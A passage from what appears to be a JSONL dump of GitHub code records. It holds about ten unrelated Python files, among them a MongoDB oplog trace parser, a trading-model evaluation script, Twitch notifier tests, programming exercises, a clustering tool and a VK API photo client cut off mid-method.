TLA_PLUS \\[(?P[\\w\\-\\d]+)] '\n r'(?P{.*})')\n\n\ndef parse_log_timestamp(timestamp_str):\n return datetime.datetime.strptime(timestamp_str, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n\n@repl_checker_dataclass(order=True)\nclass LogLine:\n # Ordered so that a sequence of LogLines are sorted by timestamp.\n timestamp: datetime.datetime\n location: str\n line: str\n obj: dict\n\n\ndef parse_log(stream):\n \"\"\"Yield LogLines parsed from a log file stream.\"\"\"\n\n def gen():\n line_number = 0\n for line in stream:\n line_number += 1\n match = line_pat.match(line)\n if not match:\n continue\n\n timestamp = parse_log_timestamp(match.group('timestamp'))\n try:\n obj = orjson.loads(match.group('json'))\n except JSONDecodeError as exc:\n print(f\"Invalid JSON in {stream.name}:{line_number}\"\n f\" {exc.msg} in column {exc.colno}:\\n\"\n f\"{match.group('json')}\")\n sys.exit(2)\n\n # Yield tuples\n yield LogLine(timestamp=timestamp,\n location=f'{stream.name}:{line_number}',\n line=line,\n obj=obj)\n\n return list(gen())\n\n\ndef merge_log_streams(streams):\n \"\"\"Merge logs, sorting by timestamp.\"\"\"\n return heapq.merge(*map(parse_log, streams))\n\n\n@repl_checker_dataclass\nclass LogEvent:\n timestamp: datetime.datetime\n \"\"\"The server log timestamp.\"\"\"\n location: str\n \"\"\"File name and line number, like 'file.log:123'.\"\"\"\n line: str\n \"\"\"The text of the server log line\"\"\"\n action: str\n \"\"\"The action (in TLA+ spec terms) the server is taking.\"\"\"\n server_id: int\n \"\"\"The server's id (0-indexed).\"\"\"\n currentTerm: int\n \"\"\"The server's view of the term.\n \n NOTE: The implementation's term starts at -1, then increases to 1, then\n increments normally. We treat -1 as if it were 0.\n \"\"\"\n state: ServerState\n \"\"\"The server's replica set member state.\"\"\"\n commitPoint: CommitPoint\n \"\"\"The server's view of the commit point.\"\"\"\n log: tuple\n \"\"\"The server's oplog.\"\"\"\n\n __pretty_template__ = \"\"\"{{ location }} at {{ timestamp | mongo_dt }}\n{{ action }} server_id={{ server_id }} state={{ state.name }} term={{ term }}\ncommit point: {{ commitPoint }}\nlog: {{ log | oplog }}\"\"\"\n\n\ndef _parse_term(term):\n # What the implementation calls -1, the spec calls 0.\n return 0 if term == '-1' else int(term)\n\n\ndef _parse_optime(obj):\n \"\"\" Convert an OpTime from JSON.\"\"\"\n # obj is like:\n #\n # {ts: {$timestamp: {t: 1578078726, i: 5}}, t: {$numberLong: '1'}}\n #\n # PyMongo's bson.json_util converts timestamp and numberLong objects but\n # it's more performant to special-case that logic here.\n as_int = obj['ts']['$timestamp']['t'] << 32 | obj['ts']['$timestamp']['i']\n return OpTime(term=_parse_term(obj['t']['$numberLong']), timestamp=as_int)\n\n\nclass OplogIndexMapper:\n \"\"\"Maps MongoDB oplog timestamps to TLA+ log indexes, 0-indexed.\"\"\"\n _optime_to_entry: Dict[OpTime, OplogEntry]\n\n def __init__(self):\n # The \"null\" commitPoint is (0, 0). 
Fake an OplogEntry for it.\n null_entry = OplogEntry(term=0, index=0, previous=None)\n self._optime_to_entry = {OpTime(0, 0): null_entry}\n self._empty = True\n\n def get_entry(self, optime):\n \"\"\"Get OplogEntry for OpTime.\"\"\"\n return self._optime_to_entry[optime]\n\n def add_entry(self, optime, entry):\n \"\"\"Add mapping from OpTime to OplogEntry object.\"\"\"\n if optime in self._optime_to_entry:\n old_entry = self._optime_to_entry[optime]\n assert old_entry == entry\n else:\n self._optime_to_entry[optime] = entry\n self._empty = False\n\n @property\n def empty(self):\n return self._empty\n\n\ndef parse_log_line(log_line, port_mapper, oplog_index_mapper):\n \"\"\"Transform a LogLine into a LogEvent.\"\"\"\n try:\n # Generic logging is in \"trace\", RaftMongo.tla-specific in \"raft_mongo\".\n trace = log_line.obj\n port = int(trace['host'].split(':')[1])\n raft_mongo = trace['state']\n optimes = [_parse_optime(optime) for optime in raft_mongo['log']]\n\n if optimes:\n if oplog_index_mapper.empty:\n # Add first entry at index 1.\n oplog_index_mapper.add_entry(\n optimes[0],\n OplogEntry(term=optimes[0].term,\n index=1,\n previous=None))\n\n # Iterate consecutive pairs of entries.\n for optime_a, optime_b in zip(optimes, optimes[1:]):\n # The previous optime must already have an OplogEntry.\n previous = oplog_index_mapper.get_entry(optime_a)\n oplog_index_mapper.add_entry(\n optime_b,\n OplogEntry(term=optime_b.term,\n index=previous.index + 1,\n previous=previous))\n\n log = oplog_index_mapper.get_entry(optimes[-1]).get_complete_log()\n else:\n log = ()\n\n commitPointOpTime = _parse_optime(raft_mongo['commitPoint'])\n commitPoint = CommitPoint(\n term=commitPointOpTime.term,\n index=oplog_index_mapper.get_entry(commitPointOpTime).index)\n\n return LogEvent(\n timestamp=log_line.timestamp,\n location=log_line.location,\n line=log_line.line,\n action=trace['action'],\n server_id=port_mapper.get_server_id(port),\n currentTerm=_parse_term(raft_mongo['term']['$numberLong']),\n state=ServerState[raft_mongo['serverState']],\n commitPoint=commitPoint,\n log=log)\n except Exception:\n print(f'Exception at {log_line.location}: {log_line.line}',\n file=sys.stderr)\n raise\n","repo_name":"mongodb-labs/repl-trace-checker","sub_path":"parse_log.py","file_name":"parse_log.py","file_ext":"py","file_size_in_byte":6679,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"69818383412","text":"import json, stanza\n\nnlp = stanza.Pipeline('en', processors='tokenize, pos, lemma, depparse')\n\nopen_list = ['E', 'A', 'B', 'C', 'D']\nfile_path = '/Users/tuanz_lu/PycharmProjects/Pytorch-learning'\n\nrestriction_num = 0\n\nfor open_tag in open_list:\n\tres = []\n\n\tfile = open(file_path+'/json_data/five/'+open_tag + '_data.json')\n\tfileJson = json.load(file)\n\tflag = 0\n\trequirements = []\n\tinputList = []\n\tinputList_cur = []\n\tfor i, one in enumerate(fileJson):\n\t\tif flag > i:\n\t\t\tinputList_cur = []\n\t\t\tcontinue\n\t\telse:\n\t\t\tline = one[\":\"]\n\t\t\trequirements.append(line)\n\t\t\tif \"restriction\" in one:\n\t\t\t\trestriction_num += 1\n\t\t\t\tinputList_cur = one[\"restriction\"][\"()\"]\n\t\t\tflag = i + 1\n\t\t\twhile flag < len(fileJson) and fileJson[flag][\":\"] == line: # 合并同一个需求的operation\n\t\t\t\tif \"restriction\" in fileJson[flag]:\n\t\t\t\t\tfor p, test_one in enumerate(fileJson[flag][\"restriction\"][\"()\"]):\n\t\t\t\t\t\tinputList_cur.append(test_one)\n\t\t\t\tflag += 
1\n\t\t\tinputList.append(inputList_cur)\n\n\tfor i, one in enumerate(requirements):\n\t\tdoc = nlp(one)\n\t\tfor sent in doc.sentences:\n\t\t\twords = sent.words\n\t\t\tone_sent = [i.text.lower() for i in words] # list of the sentence rebuilt from the words tokenized by stanza\n\t\t\ttag_list = [\"O\" for i in range(len(one_sent))] # tag list\n\t\t\tfor inp in inputList[i]:\n\t\t\t\tone_inp = inp.lower().split() # token list for each output\n\t\t\t\tll = len(one_inp)\n\t\t\t\tfor j in range(len(one_sent)):\n\t\t\t\t\tif one_sent[j:j + ll] == one_inp:\n\t\t\t\t\t\ttag_list[j] = \"B\"\n\t\t\t\t\t\tif ll != 1:\n\t\t\t\t\t\t\ttag_list[j + ll - 1] = \"E\"\n\t\t\t\t\t\tm = j + 1\n\t\t\t\t\t\twhile m < j + ll - 1:\n\t\t\t\t\t\t\ttag_list[m] = \"I\"\n\t\t\t\t\t\t\tm += 1\n\t\t\t\t\t\tbreak\n\t\t\tfor q, word in enumerate(sent.words):\n\t\t\t\tif word.text.lower() == \"then\" or word.text.lower() == \"only\":\n\t\t\t\t\topTag = 1\n\t\t\t\telse:\n\t\t\t\t\topTag = 0\n\t\t\t\tres.append(f'{word.text}\\t{word.xpos}\\t{word.deprel}\\t{opTag}\\t{tag_list[q]}\\n')\n\t\tres.append(\" \\n\")\n\n\tfw = open(file_path+'/exp/pre/restriction_pre_'+open_tag + '.txt', 'w')\n\tfor r in res:\n\t\tfw.write(r)\n\tfw.close()\n\n","repo_name":"ZacharyZhao55/ReqGen","sub_path":"req_gen_unilm/unilm/src/crf_project/exp/five_group/restriction_pre.py","file_name":"restriction_pre.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"75055920691","text":"import random\r\nx,y=0,0\r\na=int(input(\"범위를 지정하세요\"))\r\nb=random.randint(0, a)\r\nc=random.randint(0, a)\r\ne=input(\"힌트 기능을 사용하겠습니까?\")\r\nif(e=='y'):\r\n    e=1\r\n\r\nwhile True:\r\n    d=input(\"wasd중 하나를 입력하세요\")\r\n    if(d=='w'):\r\n        y=y+1\r\n    elif(d=='s'):\r\n        y=y-1\r\n    elif(d=='d'):\r\n        x=x+1\r\n    elif(d=='a'):\r\n        x=x-1\r\n    else:\r\n        print(\"잘못된 입력입니다.\")\r\n    if(y>a or y<0):\r\n        print(\"벽에 막혔습니다. 
x를 0으로 초기화 합니다.\")\r\n x=0\r\n print(\"x좌표:\",x,\"y좌표\",y)\r\n if(e==1):\r\n if(x==b):\r\n print(\"x좌표는 맞췄습니다.\")\r\n if(y==c):\r\n print(\"y좌표는 맞췄습니다.\")\r\n if(x==b and y==c):\r\n print(\"맞췄습니다!\")\r\n break\r\n ","repo_name":"bbasung1/treasure-hunt-py-ver-","sub_path":"treasure hunt.py","file_name":"treasure hunt.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35350261403","text":"import sys\nimport warnings\nfrom argparse import ArgumentParser\nfrom pathlib import Path\n\nimport torch as t\n\nsys.path.append(str(Path(__file__).parent.parent.parent))\n\nfrom AlgorithmicStrategy import DataSet, TradeTime\n\nfrom MODELS import (\n JoyeLOB,\n OCET,\n LittleOB,\n MultiTaskLoss,\n logger,\n log_eval,\n setup_seed,\n)\n\nfrom tqdm import tqdm\n\nwarnings.filterwarnings(\"ignore\")\n\n\n@t.no_grad()\ndef evaluate(ocet: OCET):\n loss_global = []\n true_vwaps = []\n pred_vwaps = []\n for file in tqdm(test_files):\n if file not in joye_data:\n joye_data.push(file)\n tick = DataSet(file, ticker=\"000157.SZ\")\n llob_file = little_lob_folder / file.name\n if llob_file not in llob:\n llob.push(llob_file)\n tt = TradeTime(begin=9_30_00_000, end=14_57_00_000, tick=tick)\n pred_trade_volume_fracs = []\n true_trade_volume_fracs = []\n hist_trade_volume_fracs = []\n trade_price = []\n\n for ts, action in tt.generate_signals():\n if action[\"trade\"]:\n time_search, X, volume_hist, volume_today = joye_data.batch(\n file, timestamp=ts\n )\n if time_search is not None:\n X = t.tensor(X, dtype=t.float32)\n # logger.info(X.size())\n pred_frac = ocet(X)\n\n _, price = llob.batch(llob_file, ts)\n\n trade_price.append(price)\n\n hist_trade_volume_fracs.append(volume_hist)\n pred_trade_volume_fracs.append(pred_frac)\n true_trade_volume_fracs.append(volume_today)\n if sum(pred_trade_volume_fracs) > 1:\n pred_trade_volume_fracs[-1] = pred_trade_volume_fracs[-1] - (\n sum(pred_trade_volume_fracs) - 1\n )\n break\n if sum(pred_trade_volume_fracs) == 1:\n break\n\n market_vwap = llob.get_VWAP(llob_file)\n true_vwaps.append(market_vwap)\n pred_trade_volume_fracs = t.squeeze(t.stack(pred_trade_volume_fracs))\n\n additional_vwap = 0\n if t.sum(pred_trade_volume_fracs) < 1:\n rest = 1 - t.sum(pred_trade_volume_fracs)\n _, final_price = llob.batch(llob_file, tick.file_date_num + 14_57_00_000)\n additional_vwap = rest * final_price\n\n trade_price = t.Tensor(trade_price)\n pred_vwap = t.sum(pred_trade_volume_fracs * trade_price) + additional_vwap\n pred_vwaps.append(pred_vwap.item())\n\n hist_trade_volume_fracs = t.Tensor(hist_trade_volume_fracs)\n hist_trade_volume_fracs = hist_trade_volume_fracs / t.sum(\n hist_trade_volume_fracs\n )\n\n true_trade_volume_fracs = t.Tensor(true_trade_volume_fracs)\n true_trade_volume_fracs = true_trade_volume_fracs / t.sum(\n true_trade_volume_fracs\n )\n\n loss = loss_func.calculate_loss(\n pred_trade_volume_fracs,\n true_trade_volume_fracs,\n hist_trade_volume_fracs,\n market_vwap,\n pred_vwap,\n )\n # loss_global.append(loss.item())\n log_eval(file=file.stem, loss=loss.item())\n # plotter(loss_global, ylabel=\"loss\")\n # plt.figure()\n # plt.plot(pred_vwaps, label=\"pred\")\n # plt.plot(true_vwaps, label=\"true\")\n # plt.legend()\n # plt.show()\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"Arguments for the strategy\", add_help=True)\n parser.add_argument(\"-s\", \"--seed\", type=int, default=2333, help=\"set random seed\")\n 
parser.add_argument(\"-e\", \"--epoch\", type=int, default=20)\n parser.add_argument(\"--dataset\", type=str, default=\"./DATA/ML\")\n parser.add_argument(\"--model-save\", type=str, default=\"./MODEL_SAVE_1\")\n args = parser.parse_args()\n\n logger.info(\"Starting\".center(40, \"=\"))\n # t.set_default_tensor_type(t.cuda.FloatTensor)\n device = t.device(\"cuda:0\" if t.cuda.is_available() else \"cpu\")\n logger.info(f\"Set device: {device}\")\n\n setup_seed(args.seed)\n logger.info(\"Set seed: {}\".format(args.seed))\n\n tick_folder = Path.cwd() / \"../datas/000157.SZ/tick/gtja/\"\n tick_files = list(tick_folder.glob(\"*.csv\"))\n\n model_save_path: Path = Path().cwd() / args.model_save\n if not model_save_path.exists():\n model_save_path.mkdir(parents=True, exist_ok=True)\n logger.info(f\"Saving model parameters to {model_save_path}\")\n\n raw_data_folder = Path.cwd() / \"DATA/ML/RAW\"\n norm_data_folder = Path.cwd() / \"DATA/ML/NORM\"\n label_data_folder = Path.cwd() / \"DATA/ML/LABEL\"\n little_lob_folder = Path.cwd() / \"DATA/ML/LittleOB\"\n\n train_folder = Path().cwd() / \"DATA/ML/000157/train\"\n test_folder = Path.cwd() / \"DATA/ML/000157/test\"\n train_files = list(train_folder.glob(\"*.csv\"))\n test_files = list(test_folder.glob(\"*.csv\"))\n\n joye_data = JoyeLOB(window=100)\n llob = LittleOB(direction=\"BUY\")\n loss_func = MultiTaskLoss()\n ocet = OCET(\n num_classes=1,\n dim=100,\n depth=2,\n heads=4,\n dim_head=25,\n mlp_dim=200,\n )\n\n newest_model = model_save_path / \"500.ocet\"\n # para_dict = t.load(newest_model, map_location=device)\n para_dict = t.load(newest_model, map_location=t.device(\"cpu\"))\n ocet.load_state_dict(para_dict[\"model_state_dict\"])\n # ocet.to(device='cpu')\n # with t.no_grad():\n # ocet.eval()\n\n # optimizer = optim.Adam(ocet.parameters(), lr=0.0001, weight_decay=0.0005)\n\n \"\"\"\n Scripts begin\n \"\"\"\n evaluate(ocet)\n","repo_name":"Me2yhm/Algorithmic-Trading","sub_path":"AlgorithmicStrategy/TWAP_VWAP/main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":5629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28579006930","text":"import sys\nimport unittest\n\nimport twitchNotifier\nfrom twitchApi import Stream\n\nsys.path.append(\"tests\")\nimport utils\n\n\nclass TwitchTests(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.bot = utils.StubIrcRobot()\n\t\tself.twitchClient = utils.StubTwitchClient(\"\")\n\n\t\ttwitchNotifier.config = utils.StubConfig()\n\t\ttwitchNotifier.STREAMS = [\n\t\t\tStream(self.twitchClient, \"test1\", 0),\n\t\t\tStream(self.twitchClient, \"test2\", 0)\n\t\t]\n\n\tdef testTwitchUsersLive(self):\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.assertEqual(\n\t\t\t[\n\t\t\t\t(\"testclient\", \"test1 is streaming Test Stream\"),\n\t\t\t\t(\"testclient\", \"test2 is streaming Test Stream 2\")\n\t\t\t],\n\t\t\tself.bot.messages\n\t\t)\n\n\tdef testTwitchUserNewStream(self):\n\t\t_newStream = {\n \"id\":\"2\",\n \"user_id\":\"1234567891\",\n \"user_name\":\"test1\",\n \"game_id\":\"509658\",\n \"game_name\":\"Just Chatting\",\n \"type\":\"live\",\n \"title\":\"Test Stream 3\",\n \"viewer_count\":2864,\n \"started_at\":\"2021-01-06T14:13:17Z\",\n \"language\":\"en\",\n \"thumbnail_url\":\"\",\n \"tag_ids\":[\"f08d5873-f0c7-4912-94ba-a41933b4c141\"]\n 
}\n\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.bot.clear()\n\t\tself.twitchClient._getStreamingStatusReply[\"data\"].pop()\n\t\tself.twitchClient._getStreamingStatusReply[\"data\"].append(_newStream)\n\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.assertEqual(\n\t\t\t[(\"testclient\", \"test2 is streaming Test Stream 3\")],\n\t\t\tself.bot.messages\n\t\t)\n\n\tdef testTwitchUsersNoDupeNotification(self):\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tfor stream in twitchNotifier.STREAMS:\n\t\t\tself.assertIsInstance(\n\t\t\t\tstream.lastNotification,\n\t\t\t\ttwitchNotifier.Notification\n\t\t\t)\n\n\t\tself.bot.clear()\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.assertEqual([], self.bot.messages)\n\n\tdef testTwitchUsersStopNotification(self):\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.bot.clear()\n\t\tself.twitchClient._getStreamingStatusReply[\"data\"].pop()\n\n\t\ttwitchNotifier.periodic(self.bot)\n\t\tself.assertEqual(\n\t\t\t[(\"testclient\", \"test2 has stopped streaming.\")],\n\t\t\tself.bot.messages\n\t\t)\n","repo_name":"mernisse/ircbot","sub_path":"tests/test_twitchNotifier.py","file_name":"test_twitchNotifier.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"71845813812","text":"def cal(oper, a, b):\n if oper == '+':\n return a+b\n if oper == '-':\n return a-b\n if oper == '/':\n return a/b\n if oper == '*':\n return a*b\n\n\ndef dfs(num):\n if num >= len(arg) or arg[num] == 'x':\n return\n\n if len(arg[num]) == 3:\n left = dfs(arg[num][1])\n right = dfs(arg[num][2])\n return cal(arg[num][0], left, right)\n else:\n return arg[num][0]\n\n\n\nfor tc in range(1, 11):\n n = int(input())\n arg = ['x' for _ in range(1001)]\n for i in range(n):\n tmp = list(input().split())\n if tmp[1].isdigit():\n arg[int(tmp[0])] = [int(tmp[1])]\n else:\n arg[int(tmp[0])] = [tmp[1], int(tmp[2]), int(tmp[3])]\n ans = dfs(1)\n print(f'#{tc} {int(ans)}')\n","repo_name":"xktmxkem/TIL-Today-I-Learn","sub_path":"algorithm/in_class/사칙연산.py","file_name":"사칙연산.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14388102838","text":"class Item:\n pay_rate = 0.8 # The pay rate after 20% discount\n \n def __init__(self, name: str, price: float, quantity=0):\n # Run validations to the received arguments\n assert price >= 0, f\"Price {price} is not greater than zero!\"\n assert quantity >= 0, f\"Price {quantity} is not greater than zero!\"\n \n self.name = name\n self.price = price\n self.quantity = quantity\n \n def calculate_total_price(self):\n return (self.price * self.quantity)\n \n def apply_discount(self):\n self.price = self.price * self.pay_rate\n \n \nitem1 = Item(\"Phone\", 100, 5)\nitem2 = Item(\"Laptop\", 10000, 3)\n\n# print(Item.pay_rate) # This is how we acsess class attributes\n\nprint(Item.__dict__) # All the attributes for the class level\nprint(item1.__dict__) # All the attributes for the instance level\n\nitem1.apply_discount()\n\nitem2 = Item(\"Laptop\", 1000, 3)\nitem2.pay_rate = 0.7 # To change the default class attribute value\nitem2.apply_discount()\n\n","repo_name":"Tharindu-Dasantha/CS","sub_path":"python/oop/tute1/class_attribute.py","file_name":"class_attribute.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71507907253","text":"import torch\nimport 
torchvision\nimport torchvision.io\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom segnet import Segnet\nfrom torch import nn\n\nimage = Image.open(f\"image.png\")\nmask = Image.open(f\"mask.png\")\n\ntransform = torchvision.transforms.ToTensor()\nimage = transform(image)\nmask = transform(mask)\nmask1 = mask\nmask2 = mask1.clone()\nmask2[mask2==0] = 2\nmask2[mask2==1] = 0\nmask2[mask2==2] = 1\n\nprint(image.shape)\nprint(mask1.shape)\nprint(mask2.shape)\n\n\ns = Segnet()\ns.train()\ncriterion = nn.MSELoss()\n\n\nnum_epochs = 100\nfor epoch in range(num_epochs):\n    image = image.reshape(1, 1, 28, 28)\n    mask1 = mask1.reshape(1, 1, 28, 28)\n    mask2 = mask2.reshape(1, 1, 28, 28)\n    s.mask1 = nn.Parameter(mask1)\n    s.mask2 = nn.Parameter(mask2)\n    s.mask1.requires_grad = False\n    s.mask2.requires_grad = False\n    optimizer = torch.optim.Adam(s.parameters(), lr=1e-3, weight_decay=1e-5)\n    y_hat = s(image)\n    y = torch.zeros_like(y_hat)\n    loss = criterion(y_hat, y)\n    optimizer.zero_grad()\n    loss.backward()\n    optimizer.step()\n    print(f'Epoch:{epoch + 1}, Loss:{loss.item():.4f}')\n\ntorch.save(s.state_dict(), 'models/cnn.h5')\n\nimage = image.reshape(1, 1, 28, 28)\nmask1 = torch.rand_like(image)\nmask2 = torch.rand_like(image)\nfor epoch in range(num_epochs):\n    s = Segnet()\n    s.mask1 = nn.Parameter(mask1)\n    s.mask2 = nn.Parameter(mask2)\n    s.load_state_dict(torch.load(\"models/cnn.h5\"))\n    s.mask1 = nn.Parameter(mask1)\n    s.mask2 = nn.Parameter(mask2)\n    s.mask1.requires_grad = True\n    s.mask2.requires_grad = True\n    optimizer = torch.optim.Adam(s.parameters(), lr=1e-3, weight_decay=1e-5)\n    y_hat = s(image)\n    y = torch.zeros_like(y_hat)\n    loss = criterion(y_hat, y)\n    optimizer.zero_grad()\n    loss.backward()\n    optimizer.step()\n    print(f'Epoch:{epoch + 1}, Loss:{loss.item():.4f}')\n    mask1 = s.mask1.data\n    mask2 = s.mask2.data\n\nplt.imshow(mask1.reshape(28,28))\nplt.show()\nplt.imshow(mask2.reshape(28,28))\nplt.show()\n","repo_name":"arf-themascoteers/seg","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2281400244","text":"import numpy as np\r\nimport random\r\nfrom sklearn.cluster import AffinityPropagation\r\nfrom sklearn.cluster import KMeans\r\nimport warnings\r\nimport distance\r\nimport pandas as pd\r\nimport os\r\nimport time\r\nimport logging\r\nfrom datetime import datetime\r\n\r\nwarnings.filterwarnings('error')\r\nlogging.basicConfig(filename='errors.log', level=logging.DEBUG)\r\npath = os.environ['ONEDRIVE'] + \"\\\\Documents\\\\2021\\\\Projects\\\\NLP_NN\\\\\"\r\nout_path = path + 'Aff_Prop_Output\\\\'\r\nfile = \"Test_List.csv\"\r\n\r\n\r\nclass Classify:\r\n\r\n    def __init__(self, path=path, file=file, alg=0):\r\n        self.words = pd.read_csv(path+file)\r\n        self.alg = alg # 0-aff_prop / 1-km\r\n\r\n    def transform_list(self, word_list=False):\r\n        # TODO: underlier_id_type to pre-process\r\n        words_transformed = []\r\n        if word_list:\r\n            if isinstance(word_list, list):\r\n                self.words = pd.Series(word_list)\r\n        self.words = self.words.drop_duplicates()\r\n        for w1 in self.words.values:\r\n            for w2 in w1:\r\n                s1 = w2.split(',')\r\n                for w3 in s1:\r\n                    s2 = w3.split(';')\r\n                    for w4 in s2:\r\n                        words_transformed.append(w4)\r\n        words_transformed = pd.Series(words_transformed).drop_duplicates().tolist()\r\n        return words_transformed\r\n\r\n    def get_word_list(self, word_list):\r\n        if word_list:\r\n            words2 = self.transform_list(word_list=word_list)\r\n        else:\r\n            
words2 = self.transform_list()\r\n return words2\r\n\r\n def calc_levenshtein_dist(self, words, sample_size):\r\n words_array = np.asarray(random.sample(words, k=sample_size))\r\n print(\"Starting distance calculation..\")\r\n lev_similarity = -1*np.array([[distance.levenshtein(w1, w2) for w1 in words_array] for w2 in words_array])\r\n print(\"Finished distance calculation..\")\r\n return lev_similarity, words_array\r\n\r\n def run_km(self, lev_similarity, k_size):\r\n k = k_size\r\n km = KMeans(n_clusters=k, max_iter=100)\r\n km.fit(lev_similarity)\r\n return km if km else None\r\n\r\n def run_prop(self, lev_similarity):\r\n affprop = AffinityPropagation(affinity=\"precomputed\", damping=0.5, random_state=None)\r\n affprop.fit(lev_similarity)\r\n return affprop if affprop else None\r\n\r\n def main(self, run_times=100, sample_size=2500, word_list=False):\r\n words2 = self.get_word_list(word_list=word_list)\r\n word_dict = {'Word': [], 'Matches': []}\r\n for i in range(run_times):\r\n start = time.time()\r\n lev_similarity, words_array = self.calc_levenshtein_dist(words=words2, sample_size=sample_size)\r\n try:\r\n if self.alg == 0:\r\n cluster = self.run_prop(lev_similarity)\r\n for cluster_id in np.unique(cluster.labels_):\r\n word_dict['Word'].append(words_array[cluster.cluster_centers_indices_[cluster_id]])\r\n word_dict['Matches'].append(np.unique(words_array[np.nonzero(cluster.labels_ == cluster_id)]))\r\n elif self.alg == 1:\r\n # Note: for KM the clusters are not labelled as with Affinity Prop\r\n cluster = self.run_km(lev_similarity, sample_size)\r\n order_centroids = cluster.cluster_centers_.argsort()[:, ::-1]\r\n for cluster_id in np.unique(cluster.labels_):\r\n # print(\"Cluster ID: %d\" % i)\r\n # for j in order_centroids[i, :10]:\r\n # TODO: need to fix the word append with results=km.fit_predict\r\n word_dict['Word'].append(cluster_id)\r\n word_dict['Matches'].append(np.unique([words_array[match]\r\n for match in order_centroids[cluster_id, :60]]))\r\n else:\r\n print(\"Wrong algorithm selected.\")\r\n raise Warning(f\"Wrong input for algorithm type: alg={self.alg} is not a selection.\")\r\n\r\n except Warning as e:\r\n logging.log(level=logging.DEBUG,\r\n msg=f'{datetime.now().strftime(\"%Y-%m-%d-%H:%M:%S\")} Query failed to run.')\r\n logging.error(e)\r\n print(\"Convergence failed, see the log.\")\r\n finally:\r\n end = time.time()\r\n runtime = (end - start) / 60\r\n logging.log(level=logging.INFO,\r\n msg=f'{datetime.now().strftime(\"%Y-%m-%d-%H:%M:%S\")} Runtime: {runtime} minutes')\r\n print(f\"Completed in: {(end - start) / 60} mins\")\r\n return word_dict, cluster\r\n\r\n\r\nclass CompileApply:\r\n #TODO: connect the first class to this one, also allow for separate files as designed here\r\n\r\n def __init__(self, file_path: str = out_path):\r\n self.path = file_path\r\n self.files = [x for x in os.listdir(self.path) if x.find(\"file\") != -1]\r\n\r\n def get_df(self, files):\r\n df = pd.DataFrame()\r\n for file in files:\r\n df_temp = pd.read_csv(self.path+file)\r\n if not df_temp.empty:\r\n df = df.append(df_temp)\r\n df = df.reset_index()\r\n df = df.drop(labels='Unnamed: 0', axis=1)\r\n return df\r\n\r\n def get_unique(self):\r\n df = self.get_df(self.files)\r\n multi_matches = df.groupby(['Word'])['Matches'].nunique().sort_values()\r\n words = [x for x in multi_matches.index]\r\n return words, df\r\n\r\n def merge_matches(self):\r\n words, df = self.get_unique()\r\n word_dict = {word: [] for word in words}\r\n for word in words:\r\n match_list = []\r\n results 
= df['Matches'].loc[df['Word'] == word]\r\n # clean and get the results\r\n for row in results:\r\n row_matches = row.replace(\"[\", \"\").replace(\"]\", \"\").replace(\"'\", \"\").replace(\"\\n\", \"\")\r\n row_matches = row_matches.split(\" \")\r\n for match in row_matches:\r\n match_list.append(match)\r\n # drop the duplicates\r\n match_list = pd.Series(match_list).drop_duplicates().tolist()\r\n # loop through results and append to dict if the result is not in the list already\r\n for match in match_list:\r\n if match not in word_dict[word]:\r\n word_dict[word].append(match)\r\n return word_dict\r\n\r\n def export_list(self):\r\n word_dict = self.merge_matches()\r\n df = pd.DataFrame.from_dict(word_dict, orient='index')\r\n df = df.transpose()\r\n df.to_excel(self.path+f'{self.files[0].strip(\".csv\")}.xlsx')\r\n\r\n\r\nif __name__ == '__main__':\r\n # cluster = Classify(alg=0, file='DDR_IR_UNDER.csv')\r\n # output = cluster.main(sample_size=1000)\r\n # df = pd.DataFrame.from_dict(output)\r\n # df.to_csv(self.path+'IR_2022-01-06.csv')\r\n transform = CompileApply()\r\n transform.files = [x for x in os.listdir(out_path) if x.find(\"IR\") != -1]\r\n transform.export_list()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"nlombardi/worksamples","sub_path":"Machine Learning Sample - Multi-Cluster[wip]_2022.py","file_name":"Machine Learning Sample - Multi-Cluster[wip]_2022.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74059123892","text":"import requests\nfrom datetime import datetime\nfrom pprint import pprint\n\n\nclass Vk:\n url = 'https://api.vk.com/method/'\n\n def __init__(self, token, version):\n self.token = token\n self.version = version\n self.params = {\n 'access_token': self.token,\n 'v': self.version\n }\n self.owner_id = requests.get(self.url + 'users.get', self.params).json()['response'][0]['id']\n\n def get_name(self, user_id=None):\n if user_id is None:\n user_id = self.owner_id\n url = self.url + 'users.get'\n params = {\n 'user_ids': user_id\n }\n response = requests.get(url, params={**self.params, **params}).json()\n return f\"{response['response'][0]['first_name']} {response['response'][0]['last_name']}\"\n\n def get_photos(self, user_id=None, count=50):\n if user_id is None:\n user_id = self.owner_id\n url = self.url + 'photos.get'\n params = {\n 'owner_id': user_id,\n 'album_id': 'profile',\n 'extended': 1,\n 'count': count\n }\n response = requests.get(url, params={**self.params, **params})\n return response.json()\n\n def max_quality(self, 